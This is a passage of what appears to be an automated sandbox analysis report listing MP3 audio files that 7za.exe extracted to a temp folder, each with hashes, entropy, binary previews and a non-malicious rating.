      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info..........U............. $'(+.0367:>?BEGJMNQTVY\^adehkmpstx{|.......................................................Lavc58.11............$........U.K..;.................. d......."..... ....,.+..` ..4......m.Kl.....cN./..i!..]......N[cq..>q&..b........._.....i!..9.C..Z...wz(iE$j.D.....W.../N.SkT.T.."d......!..... ....`...`...4......3..w.B..*..c...`..R.v..m:?B^.,.T..$...A.!"..|ue,...eV).j..*@...I-sm..[..;.Z..KIx0(.@.#[..G.."d+....G.F..... ....p./.. ..4.......].W}......9A..c..V....M.a..Z...%...H>z}..].v...w]...U.......m.1{....~8V...WM.._....B>2..... d@....@"..... .........`...4.... ..b..g....l...+;...D..UR.3.d..@$.....9._..E*1.k"..lFo..a...2...m...|.....@..ON..*}u.l.0..."dZ...E....... .............4....S....j......>...!h...~..r.@..D...v..EJ..H..1?:B...T.|....%.iV...d..f.x.....[.59.....,.0a.@.."ds.....H...... ......$F.e...4.......XWs.p.....V......Lz.Q6w..X.... .h.Z".cK.L...|..`....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):32775
      Entropy (8bit):7.592395075091408
      Encrypted:false
      SSDEEP:
      MD5:4C10D5C4559205A15B2BF05C02C270E7
      SHA1:C03B2C1257A4ACD2840EE6F8A6CE99D9F1500F68
      SHA-256:83FAA1FC41B1DF831D6608975E50C9885B13C5198FBCD6D0794C77F9DFFF0B7F
      SHA-512:3C3167A0A697F19B1DFCAC2290FB8AC6F72091B35CF78A818C7F0B476134D24A5ED5F8B800C8B1E8A4D37554379C5FEA299EA04C9DE981C30F8CAB35BDAD349E
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info........................ #%(*-/2479<>ADGILNQSVX[]`begjloquwz|.......................................................Lavc58.11............$..........>..................... d.....@!..... .........`@..4.......@n............w?.v..8..A,.y..7.....4.T...A.._..l.Z...Z.*.2H.........2.'G.......J.. u .."d.....HB..... ....X.-..@ ..4.....Xb0.I...o .w.}..y!...D-5X5.Z...V.}_.}.j...U.........6....v.......`.iu.-B....H0 2x..`...,..]...."d2.....0.... ........`@..4....?.......&p.'.b..-..D.1 ..D.\.....9..s(.0.8..Jo...;...A..Mt...p....2.39....L......*....... dJ....HI...... .....u&..G...4.....3(.....z..z..I..j:.@.<..]..# ..xl@.h..:9..*....I.[.:uO}V.}+.(i..-4r../Q...-.w;...@I$.R...."dY...L.,..... ......:..1...4....D.....Y.E.*.....V..>..IH..%.B.=w..S.....Q......a...L.......:<....7....iY...Me.:....7..V....R.."dT..P.V..I.... .....)M-a"...4........y.vb......S.2...p..EDO. l...JgY....#.........a.u....Y.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):32253
      Entropy (8bit):7.580809138039461
      Encrypted:false
      SSDEEP:
      MD5:4A969D7A465808C22ACD768A88AB502F
      SHA1:EDFA1B79D3956AC80E69DB77AB12E7B4162E6843
      SHA-256:D1EF5DCC2D2029B46F32634256E19D9ACC9A8B32E524B614CD73BE980D64F163
      SHA-512:E573FABAF2EB93F77F3645C21E5E141A44D23FCDAE9EE25823C95E73281581B62CFC241372E5FBEC28F67DA5782F8FBA2C06D28B1E55E3FC9A5454E3D9ED592C
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info..........}............. "%(+-02579<>BDGILNPSUXZ^`cehjloqtvz|.......................................................Lavc58.11............$........}.9.C.................. d......H"..... ....P.-.. ..4......i.@...I....r.w.}.'[..&...$..}.K.j\...n.b...X..I..."@...)s....$...%.}.`.Q...Q:.-.'...Z.."d......h!..... .......!.@...4......F..L.J.1.D.B.q[..w..l...Y..a...\`".0..c..z.h...P.......d.D.@.!..iA....._.e.]G....dP..b.2.."d,....E....... .........@@..4....!X..m.I%.._..M..j%.o'....X.Dtf..Ru...2`X6.C..!O.....q-.........E.m......v....D.@...A...... dB......B..... ....0./..@ ..4....`....[ZS7...B.6:..`..(..l.......H.`...M...t2...:...:..Bo... ..#...zt.r{.{..r...2...@.."dW............ .........@...4.......................".}3G....S..$.8$:....@p.....,....8..J...(...`. ...1.......1<.$ n.Q........."do.......... ........$`...4.......-$...\g.y..'2.x...g..]^...Ps.....%S#......H.....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):26245
      Entropy (8bit):7.568432324359011
      Encrypted:false
      SSDEEP:
      MD5:39422F0B210E416CB45A16B2E3439777
      SHA1:D8051F4B8B1D1CE45E76F70E7544E0B983021FF8
      SHA-256:7294A56FA1A088B8AA20D5732FE835D43495836E668B2C2B49B9A486D29E539B
      SHA-512:0BB3B147D50C90D289E88B069944C306FE33E60A323A9240A56A417A0F28B60FE5B347436C2756B5B63805B35127F4EC3C261F45A7718A5C76A05A77FAFCA4C2
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info..........fX............ #%(*-/257:<?ADFILNQSVX[]`cehjmortwy|.......................................................Lavc58.11............$.\......fX...b.................. d......HF..... ......!#.@...4.....:.....by.......9.....p......PB.-..D................@.u.K.H.8.........Ey...|.].SeW.^..>...."d.....HA&. ... ......'!$` ..4......U..G...2yw.s.Z._..y...7*..ApAD!..5..u......'.@..#..z(.h..n...u.g..@H...I.. ...qs....."d....G.o0.... ....@.+.. ..4......C./]Of.I..5y.(.U...DV\`y.0+/$.%...I.........................}z..4S8.P8....J.@.......=.s~.... dE......)..... ....d.3.. ..4....m&...AGZ:.46~F....p..")%..M......1.j..-..5..hkG./.u....{Oev31T"D .Z...N,AUf.fY.....@9...H.."dY..I(....... ......8..+...4......bgtn..9.U.U....G.*6...v}h..4p....L*.(.P..kd...ew.Ufw.ga ...d'M.......J..'.]........D...8.."dU...-.).Kp... .....+]......4.......'.v.u@].g.Q..2I.U.....10MPQ...?.&;j!.....h..%.;.pP.....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):29118
      Entropy (8bit):7.58564141052769
      Encrypted:false
      SSDEEP:
      MD5:D92F02B228867064683F2B0617245E2D
      SHA1:37D444CCF2303BDD36879B383D986A91B3110129
      SHA-256:080E79C69A1D185D8B9BE8F68631CFA08E67AEE1DBFA542DAF332D4AC2EA53D5
      SHA-512:ECA936B6E9C5091EE9DA136A52DC559A6DCA9FEBC3C723AA74039E556B5CDA276EF92F47039C3D7A6EC4063F4F53328CBC24DB33BB51450B672578BC3CD8952F
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info..........q............. #%(+-/257:<?BDFILNQSUY[]`behjlprtwy|.......................................................Lavc58.11............$.N......q.P<.................... d.....B@a..... ....D..C.`...4..........>...p`N.....}..-...P....$.<>M.`.....x.w.=*. .n. ....+]."...s......>..mYcn6..@H..Ck.."d.....Ih...... ....D.+..` ..4....s.....kn.E...e.j. b..@....R..h.....D.(H.O....Z...b..g._..j..@$..Z_&.^...z......!.(...%..."d)...F....... .......#. ...4....>..U....!K.p.. rA.XF..-....Bw.......$.`.P..j.Y..hvKv.7.L.@.w..".\i...Ulf..N.'........x.g..4e.. dA...I.&..... ......#..@ ..4.....\}.@..b...|N.AB..1..8....!Y...I3@i.w..p.V......*.|..!...4....k...P....<.'.HW.<]...iB......"dY....H.8..... .....A*..F...4....[.@.....>..v.W...a...E....a...#....~'0......."..u.........o.}..7.\~.3q]....g. 44$...D.k.."dj..4.L..8@... .....K<..`...4....Ir..N..A...i..e...vE01..._.o...&Z.F....*_...wH..P.-..L"
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):36171
      Entropy (8bit):7.588799352463041
      Encrypted:false
      SSDEEP:
      MD5:E414274674FBAEC88F08D34A983AE547
      SHA1:DD5AAA032614E2A984F9FE81974E7B82F4465B8F
      SHA-256:6E7D8AAD08E985FE932E249610CCA36E2B3BD5AC0D72BA22B0A08F6C13189BC5
      SHA-512:F76A9568E35FCF523A0007989237F492B454136C7E479BCD36F739A425D3453D5A297D0C7B8326400C0917342674EC9A9EA5C2BFAFAFF6D7615FCA87A15767F7
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info........................ "%(+,/2579<?ADFIKNQSUX[^_behjlortwy|~......................................................Lavc58.11............$.F............................ d......&. ... ....$./..@ ..4....2'..}"8..u$1...Ju......E[... ...N.........9F.j.....#...b.j...bK.......QD%.._......Z....u...."d.....K.A..... ........$ ...4....E....,.....%.M.k..4..t.k.b..7$wv.`....j.$..........*._.Q.<."t.J....V.>.YK.R.T.".....'u#...e...."d/............ ......+... ..4........F....-.(.H...9Ni;..~./...nA5/.~..cB4.$.4.c....z.....Eu.2.X.(...Z.6n.....h.. .f..'o..a.DF1.. dE.....)...... .........@@..4......hcG.MzdD.a.<.......yG.....7`;..A.Uo/..C.q.rDK.....6.M.q........Z.cv.J.?[.~..._.Jm+....2..p.e.."d[....J`...... ....$........4........ 0.q.$..c.K....;..E..k..`.B...B.?>h?.+.]..>..j.....*..7....3.y...N.?...r.......J*..GI.."dr...#L..0.... .....yB.=&...4.....'g.>.:..@.n(.....R.l|..P..4.......Q..h...b'AH..g4$...C
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):20498
      Entropy (8bit):7.547414297662249
      Encrypted:false
      SSDEEP:
      MD5:C513164C473F0AA5C0611348442784C6
      SHA1:7BEAE5588FAA66B4F2E213CFAC6B3DD2497B7B9C
      SHA-256:03C91316BCEDA8CEABA633426B9B9DC155B388B09D5ABDE585CD74734FECEB56
      SHA-512:A889232EFE018E852289E266C9CEB34DF700383F871238507DC20B42C3E9C00B842B3C6E29B2424F55A3A0F8BFBA88B698FC9AA5BF9934640FD225BE6EA01EAC
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info..........O............ !$&)+.0368;=@BEGJLORTWY\^acfiknpsuxy}~......................................................Lavc58.11............$.w......O...................... d....C.b..... ....X...$....4.....V...E. q3.T...U.'.|@.......P.....4\...._../&....e.D.@.,.....5."....w.i....J>.$.q8X.rM.H...."d......h...... ....H....@...4........Gx|.*$.1h..h."..8.`].....+.H..F..!....,.S.......5...h..J...` .(..@E....U......8.BQ9.a....."d+....F....... ....X.+..@ ..4....D.. ..V.....5~...^..Pb...H....V..Kg..o.Iy-...c.H.I..=./g.$gq....6.....1-r.B..{y{...).]........ d?...F... ... ....8.+..` ..4..........}W^.$..>...B.Z..N.l.0.cP.(...<.....F.Az="p.."..:.``Rp...%F...4.~...........Fm...}......."dV......0.... ....@....@...4......C!..-.G.....VGE...o..1....M.......O.Q.D....qU....7.... ..j..9..x.....#.......>..C:.]^& ......"dl....... ... .....U&E.L...4.... ...o..P.U...@.).Cf.a./....@"<...+...4...M.()Gm..\.4..'
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):23894
      Entropy (8bit):7.567953060298802
      Encrypted:false
      SSDEEP:
      MD5:A26D8D925A525B9718DA268D2B6DD2D6
      SHA1:8818E5FF34125466E1AFC3B03854B6F0222404E0
      SHA-256:5CBAE7C2A9F265D26D2A8D98EFDA46860F48FD965A0C7D7EC4AD46C926B6E514
      SHA-512:426DD593127065C7AD7F7C1FB89F86BE77055AFDBD3FE7E5D07C14FF2CCE2D0AFEADA704159BCEC3FF9B793DB3C39FC1E5FEAAE9981C8C47C26B815A516A8D71
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info..........])............!#&)*-0368:=?BEFILORSVY[^`behknoruwz|.......................................................Lavc58.11............$./......]).y]................... d....?....... ....4....B@..4..................?. N..>."A..l...\:...?...j.....%....RxX.....~3_......u.H.8L.m..&)WZ..W.....H.."d.....F.!..... .............4....i...x..0.#he.........S.'.!Al.,.x6.*.f.]IM....$..3.*u.\..\_.g.V.@....J. ].N..t%...N...B...."d1.....H...... .......$.`...4.....u.(B4..Sl...@j.t{...#........#.....}..3....*..s.."...ME,f..Wydl@....E+.........@...N./..OY.... dH....)..... .......#.@...4.......E.$.....`.j.NT1._Zm..o...^..:.UD.......+'Y..k.@.A.m.C.gFj......=.....y.@.[q.(.T.....b.#B.."d_....Ha..... ....(....`...4....B............;...1K...[+.|..T5..Vo.....'..Mf..r.....aOf6....?../.`..g.\..X_........z..w...."dv.....h"..... ......... ...4....O..b....z.!._6....Q>].w.o.f....Mwz..G....!.R......E...C...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):28204
      Entropy (8bit):7.582485353735313
      Encrypted:false
      SSDEEP:
      MD5:520B720AE798CF772526B211A96D4552
      SHA1:75303E88F46A6234B20959DFAB5D0BA1E8015F77
      SHA-256:85F64DB3138E5FA15D42084E56808E05663708ECD7FF41F0C3C085EED2633CE8
      SHA-512:9B7B4D724011EABF016F691E7ED1D491541835992AE674AC655964316BF451784103FC3C87FD50AF7B5BED3E1192A18E1D288C1ABD5DF9AE2A859A5E1F3AD99B
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info..........m............. #%)+-0247:=?BDFILOQSVXZ^`cehjlpruwy|~......................................................Lavc58.11............$........m.5tp................... d........0.... .........`@..4.......D.."4..... .8|Tr..y5...,&!Z.....3U......... .,z.."..|S)...c}53..>....A.@.yU...~...U......"d....E.l..... ....H.... ...4.....^.....?..x..0V.}.....}A..;1Ujh...d..xDA.J.t...9........}.....e.-M.pC..........=.s.^._..Z.7.."d2....D...@... .........D...4....B.}(......@.(....,+Z....m...,....@...,.Ny....j......5.1.......[.xP..n.N-.X..X.ab.i.,,.M.... dG....E.,0.... ....P./..` ..4....*..?.......rK............?.........$..O.,(....b.m..S.?.#.A3W...G5!.s.....fs.._.c.R......8%.*.."d\....J.C..... ....<.3.. ..4.....,.dR.'9O>.E....p..qs.q...Ak....M}..............~..`.....1:..ze.&...6k....A.....!.......2...."dq............ ....pK...A@..4....Ny....!+t....5.............>...g.5.UG.Z....-.`...=.\..D
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):24286
      Entropy (8bit):7.56084696677954
      Encrypted:false
      SSDEEP:
      MD5:5E3126EC08CCD34E9058E836A1D52A29
      SHA1:558E9F5F6FB5FD6E829C587E43828D8854D68766
      SHA-256:42B222F2F28D74E14B168AA3908B7B79F7356C1AAD0FFA9B7D139F1524A5B70C
      SHA-512:B260DFE55AFB25AEFD532DB5FA01DD09776F83D1F2D208BC36CAE35DEBDCFF5AD316FEF21D4AB32111502EF5FF3A2A1F670DFA5F93C4FEF4E6F1B846813BA946
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info..........^.............!#&(+.1257:=@CDGILORSVY[^abehkmpqtwz|.......................................................Lavc58.11............$.R......^.k6@................... d.....@.F..... ..........@..4.......8.$..k.B.a....c.`..O........(g8..._.R.9..9.......@.+SA. f..h.?.N..x9+.L.<....M.]?f..!.."d......0.... .............4.....2.*..h...N>.&./.&.6...+...... .....2.g..\..}.....X% ~H..}*..........S..pni..>..&....E...."d0....F...$... .......$.@...4.....x....D.(.$...@....{.... ..........l...'..)...ua...A..x..48......0..Y.{...F..M=.;....Y...... dC......i0.... ......... @..4.....!.....W.T....Q..*....m......@.o..,x.\^{..N.lq......t.....,t0.8.....!.....]G..PaZ...@Ehwg.."d]..]...0.... .....u2..I@..4....{...4.R....L.........ES..u...u..c...e!h.-...'E..fp..GD....{...y.s........0...g.......<U6.rfh.."d`.....+.(p... ....x+i...p..4......S.m*i..u......9.......r.L..B.&.t...4Us./.r..3t.0..K%...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):33559
      Entropy (8bit):7.5865982073782625
      Encrypted:false
      SSDEEP:
      MD5:462E483122F75F55D17978AACEEFD9B8
      SHA1:D38370305707DDE645EF9C998D8F50C649A26D98
      SHA-256:D1C2989C1368CAF476547B5733A042A937DA1DCB4E0FF896517A0B4D4EBFEA54
      SHA-512:6DC9DC58A522928D33135F2323CBB1FAB48BB7B1D82CA87CA31A772774203E19255DD89E47CA4B44E260DA282A1546D1BD289A8B1AE6337F5B56C0B342C0E870
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info........................ #%(*-/257:<?ADFIKNQSVX[]`behjmortwy|~......................................................Lavc58.11............$..........m..................... d.....A.&0.... ....x/...H...4....z....R.HC...xX.9s_w8.._.>"$.Fp..;^................w.R ..$:.C=..v.!.C..a..2A..p..z....f.|).Av..."d.....F... ... .....7..$'@..4.....Q...c.a.0.K.../...`!..A...z..t.j2@qz..}og..V...!V...-.W..p....../>.}..$.....X...u...]..."d%....H....... ....TO$..b...4.....+.>...q.L.....j?L.....F...BJ+.6....8t....v.4-/....bz..QT.....g....B..$r2.....5.tb.~Ij...... d8........... ....xO&..t(..4..........zF.....M......l.UoT$..:3P"`"I#4.ncR.L.....C..n1.\..@vN8..t9.G].f 2...y..&.zI...V.)&....."dL....I."2 ... ....`Q*..l...4....E.\...4.U..E.;d.....m .2...p!h...2..Q..2...5_Eb$..Q$h.Z....1.._.\.\s..{...Y....@.PG.p;T....8.."d`......&..... ...../".$.(..4....m....2..j`...............).b...&...wH.'..pu.2,.2.HFl.=.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):41004
      Entropy (8bit):7.600401076837386
      Encrypted:false
      SSDEEP:
      MD5:20B40690E9729CEF01EB2874E865F98C
      SHA1:BDAD130DCDF3A77A5BC437AF630A6AADB6FE978A
      SHA-256:03F8FC26A8143E41B8FAFAE669C4E9C5C266F914A11D32BE6F815FC9363A30EC
      SHA-512:F4C5BC7E8892D5D22E70D8A746F5AD94B1C40D812BAFC1710A7171863A9EE8005B4996E22E1429665815F50F57DD71307ED097FA7DD8E3F620D8925DEE5DA295
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info.......8................ "%'*-/2479<>ADFIKNPRUX[]_bdgimoqtvy{~......................................................Lavc58.11............$...........Q................... d.....C.#..... .......!.`...4......JIO...@..S...R..>...'..,X.....T..o.m.........^$d.....,..|........V.%M_..?...noQ.Z........"d....E..0.... .....=...A...4..........l}&....8f.n.+.T =a..lI......{?..U.A0Q.A.0h.....j.Gp..Sn.@....h...5.Q{.Q.z..g.r.$b.)>.W..."d1....F..0.... ....0....`@..4.........T....7_[....6!.C...>..M.r.r.......|...^.rC)\R}.i...............I..n..mu......>.R1t@.".A%.. dK....l..... ....|.%.. ..4.......@..P.0......k.#w..s.@....H*,.98(?hO..8......l.>.,....8.rkC .%....[Fv..v...Ad..."G.?.]M..."db........... .............4......!..Z.V.[..&..B.Q........N.-o+.q..uS).&............H,.V:.i.?.?..GP....g...S.....!..(.z......."dz.......... .............4......s.f<g`..d@....q.[l..B...o.$.?..q.'.ce....0......[....+
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):21673
      Entropy (8bit):7.557353115853458
      Encrypted:false
      SSDEEP:
      MD5:2B4061F30056655300B00FE3B74D0AD8
      SHA1:062027A59773D5AE41692B3058F2C33990369205
      SHA-256:178190470A4B028E802C406C9DDD164A4F7EE387B38FB3451BF80C9B19BC9B0A
      SHA-512:81ADD49660B80650DB05FCB1528EF73DA53EAF128FAD5771929F006E55EC04AD1F1E42FA7820B27D04BF4E9D5C39548FB24812049E74501EB32447A3C30B48EB
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info..........T|............!$&),-0358;=@CDHILOQTWY\_`cehkmpstw{|.......................................................Lavc58.11............$........T|.6.................... d......H!..... .............4.....b....b ..q.)...?>..>7u.&4......AGG:4........_.n...a.(.@ .H.Si.<.F$w. ..|..A.m8.@.....jy...."d............. ........$@@..4.....{hCJdj.L-.:=+.kY..].J.1.jJ..`......-...>E..~...U...A.D...g9.?...k...J...m .6}.{..jX....i....."d............. .............4....I...wF.@...`UHN..Tg..G.1m.....60....[.'n...t...;..U1......3.Z.....WN^...BrY.3...'H9.' 5.?.... dE.......... ....<.+..@ ..4.....'..?Ng..`cr..(8s.$....LK...sL,..~. .p.W....)E.......s3.Y.9.7..n5.,F...$...B............0...."d^......"..... ......... ...4........|.fZF3...,.@84.N.Cc..`V>.........D.....E..Qv(......m.*...$`....d=._...|`2.Q.ruZ4|..qE.."dt.......... ....Do$..e@..4.....9...0A.V...7pF.+L..5.7....:kN.C5....j.0V......`..v.qp..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):49232
      Entropy (8bit):7.606504926447272
      Encrypted:false
      SSDEEP:
      MD5:F5CA9DA928255028B55C30646BFAC6AF
      SHA1:57DF8635147538E8FF0AD41D57DDC5CA4D0D6A15
      SHA-256:E0AEABEAEF93D3EDCB9C4A3F89B1AF4010A18E12309EB5A68D19443FA7A03C99
      SHA-512:D1A973E05AB4DA5965BD0812008427108D8E3D048F19AC6F4F69561806D01251853CA61A9CF3ACB3E9D2B447CBA5D65B54EAC220FE4FD982F78288F0BC56918D
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info.......w...#............ "%'*,/2469<>@CFIKMPSUXZ]_begiloqsvy|~......................................................Lavc58.11............$.........#...................... d.....Fh"..... .............4.....G...,..9......(Qo9.G...N4....@.8bhB...u=)...vu.>D.T..!.`.X...]t1.1E...c... 1...d.".?...j...."d............ .......$..@..4.......UM.pm..'..Jo....{Wo..........8t[....l1...^.T0...r....U.....z..%...A.m..../..B ....K.A.<..."d-.....H.... ....d....@...4....l...Rh.}..X=H.A.@.|...R}?.Uf.U...Q...(....L&ce..k._..aY..z[..B<...d............b...W.A..f"... dG...F.i0.... ....4....B@..4....C.....LP#z.4.....'.5..j...0l.P.cWL7r....>Q..$....{...u...L.9. \Re..#.%.... K..L.P.s.".{...I...."dd...G....... ....p....b...4....W.~..............K.F....W..L.h5..`.E......(.j (......"74R.."......H...F.E..#aG...U..y. .7..."d~......#..... ....X.'$.@ ..4.......M1.......X......$.....\s:.>...8@.gq#......(0.3.5l
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):17624
      Entropy (8bit):7.549751351223861
      Encrypted:false
      SSDEEP:
      MD5:0E54FC467DA0D4BD9738F17403E02B63
      SHA1:92BC8DBA6C67B31207F8DED67CAADD519EC7A55C
      SHA-256:B8A2FEAF19CD541AA3EA5A2ABED481CE93D3FA900C2F2A5C1E43D5285F9FD67E
      SHA-512:72DFA85B2AA66F664108545EF1819A4FCEE4C71E2DB1B68F331D4D027DD9E7F2C23393DAB82EBEB9DC114E6143997FA1E3144DF63C97DE45AE023A64B011314B
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info..........D.............!%'),.0468<=?CEGKMORTVZ\^bdeikmqsuxz|.......................................................Lavc58.11............$........D.?.9................... d......). ... ........$....4....6.2.|.`...N.Ch..M.......h.N.(.3I.h.G~....$... ....3....r...m......j.1.".h.e. ......~..G..."d.....D...p... .............4....'.QL...@.V.?.}d..t'....\....<V.zS.*a]|o.eJ....pZ.......d.....X.&.:.>\Vn....]U...%@......T.."d/...D..1.... .........B@..4.....^....."..W..)...Y... ..JmA....A...#.....q.......f..x....,....e..].8...n......U...v.r....... dI..s.F....... .... ....@...4.........(..1S..8.+.0..Q......b.W...`...s.L&.;.......R&..r.........;.... =......cW.i..'.^.....I..."dd.....H...... ....hs&..l...4.........O,3..e8..e- ...#.0.......0.^):.. 0........Je&..s.td...}.......}....*..&....$.OT.Av..f.."dr.......a.... .....}T..6...4....d...o@........6...~..l.7I.m.$..p.....(...f.....5.45],..9.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):25853
      Entropy (8bit):7.565368587966346
      Encrypted:false
      SSDEEP:
      MD5:4AE6064F0B69E1321621DBBC60E9F909
      SHA1:54DE201B9F03589D3A7474732F20FFCA4CDB3E7E
      SHA-256:A171D4ADD22FCA00187F3EA73502E2E454705EDCE797ABD0A64DD40391C74F50
      SHA-512:BEBA2DF883058FA9E18395F1DFDF47055BA8B18C1BE068E1F1548E47411C065D936366C6E556FAF2AB9912226C286C3E04096BD80412810E73F0E54F8AFCF4E4
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info..........d.............!#&(+.0358;=@BDFIKNQSVX[^`cehkmpruwz}.......................................................Lavc58.11............$.]......d..D.).................. d.....C.C..... .........b...4.....0.Y@....@.....qY._...p......../g/....[}ww.#.8..%...P{.oG..@;z..EU...y.U......:..4...u.L......"d....D....... ......-.. ..4...................Wo.}...C..]..e~..)U..}J....NP...;D@4...5.K{|...^...0.>...qL.......l....BX.q...0.."d....E..0.... .............4............e.k .9...+.s.6kKgp.z....?.... !....*.WA?.n.."....e...P.`-...M....IE.&...|..Y...H.. dK........... ....t{......4....?..W.c..lV.}./..B.q.z{U..v.U.{..[..o...O..`.z..K..(....}..w..B..?.1q.M5...2.y.L..n...v..t.(.."dU.......Jb... ....|.R......4....J.y.x.....Hn....Yr.S.\Ju*...@...;.*h..z...1.....w..F.|LK...V,...q@......J...1..".p....Q...R.."dI..Y..ye..... .....Mw..L...4.....XaRM8....k....,..i ~.!....1.d9..i.D3Hb.|........B..!...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):21935
      Entropy (8bit):7.567488916798116
      Encrypted:false
      SSDEEP:
      MD5:EF289452E18BA5B9B0F90755836EB34D
      SHA1:5E2A7EE0714F2DD6C92B6F5B2D8CB824632A5650
      SHA-256:B302247879C252722C822CF3842B0BB2EDB3E87960ABE0278706E8E3D31281C0
      SHA-512:9B23F600315ADDCF27C02B75971DDE90272551405E1BE205AA1865BDB4E6BC4D96508FD17A058DF93B115E5EB47702F6651836A51A2A7AD689860DC1C1BBE261
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info..........U............. $'(+.0367:>?BEGJMNQTVY\^adehkmpstx{|.......................................................Lavc58.11............$........U..{.................... d.....E."..... .........d...4....."..c........r...........tD0..`H<....-...).M.B.E....lMRe.....[...[..H@T..EIE6@N........5P9..."d......H.... ....d...$@...4.....xp...V+................u.....v.U5...&.X.....g....I.W,..8.V..X.*..B....;z.f...:..@8!."{....U.."d0........ ... ....|........4.....o}.A...iR.:+.....LI.......K\|..u....NV...{..c.$.2...A..........2~.<(....SF....]........9....... dM...F....... .............4.....I......n..5.+g.7.u.@....[kN@. Su....J@;..|.Z...4............9.]...^.a.yj..Y'.`6.(... .)..."df....I+..p... .....Q2.....4.....#x&.@.6.U...D...9...HG...#2-..d....O..sD..z=...>....../.O....U.......e.A...ei..c0.~...o..F....."do....Q.oY.... ....d.k..n8..4.....(T91.x.\..B..C.HQ....(......yb.......~..g.;O..A..M..8X.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):31600
      Entropy (8bit):7.585657412854237
      Encrypted:false
      SSDEEP:
      MD5:09C439883A75AE2EA398C267E6950B98
      SHA1:0E598ED9BDE5339FB9960F94837F586324289B53
